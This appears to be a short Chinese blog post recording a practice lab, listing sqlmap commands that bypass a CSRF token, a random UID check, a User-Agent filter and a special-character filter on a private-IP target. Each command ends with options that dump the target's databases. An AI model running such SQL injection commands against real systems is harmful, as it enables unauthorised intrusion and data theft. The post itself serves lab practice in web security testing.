SQLMap绕过 Web 应用程序保护靶机(打靶记录)

jun~2025-09-26 15:24

CSRF Protection (Case #8)

sqlmap -u "http://10.22.63.5/case8.php" \

--data="t0ken=cbb99235479c0d1610c441fdf72ebd4dd3f8f8e2e95c66aeebf2018b3e087dae&id=3" \

--csrf-token="t0ken" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--level=3 \

--risk=2 \

--batch --dump-all

Random UID Protection (Case #9)

sqlmap -u "http://10.22.63.5/case9.php?id=1\&uid=1234567890" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--batch --dump-all

User-Agent Protection (Case #10)

sqlmap -u "http://10.22.63.5/case10.php" \

--data="id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--random-agent \

--batch --dump-all

Special Character Filter (Case #11)

┌──(kali㉿kali)-[~]

└─$ sqlmap -u "http://10.22.63.5/case11.php?id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--tamper="between,space2comment" \

-D nextcyber \

--dump \

--batch

相关推荐
西猫雷婶2 小时前
python学智能算法(三十九)|使用PyTorch模块的normal()函数绘制正态分布函数图
开发语言·人工智能·pytorch·python·深度学习·神经网络·学习
每天更新2 小时前
linux驱动开发笔记
linux·驱动开发·笔记
Mr.45672 小时前
Linux安装配置Redis 7.2.3教程
linux·运维·服务器
wheeldown3 小时前
【Linux】Linux文件系统详解:从磁盘到文件的奥秘
linux·运维·服务器
倔强的石头1063 小时前
解决Markdown笔记图片失效问题:Gitee+PicGo图床搭建全攻略
笔记·gitee·picgo·obsidian
挨踢攻城3 小时前
Linux安全 | 防火墙工具 iptables 详解
linux·安全·iptables·rhce·rhca·厦门微思网络·linux防火墙工具
新子y3 小时前
《代码的“言外之意”:从词源学透彻理解编程》字符的“双重生活”:从Escape到Raw
笔记·python
2301_800050993 小时前
DHCP 服务器
linux·运维·笔记
墨^O^3 小时前
网络通信协议全解析:HTTP/UDP/TCP核心要点
linux·服务器·网络·学习
热门推荐
01Multisim使用教程详尽版--(2025最新版)02UV 工具安装与国内镜像源配置指南03GitHub 镜像站点04Spec-Kit 使用指南0546个Nano-banana 精选提示词,持续更新中06UV安装并设置国内源07保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)082025年华为杯研赛数学建模竞赛C题完整参考论文 (含模型、MATLAB和Python代码)09VsCode远程Copilot无法使用Claude Agent问题10Linux下V2Ray安装配置指南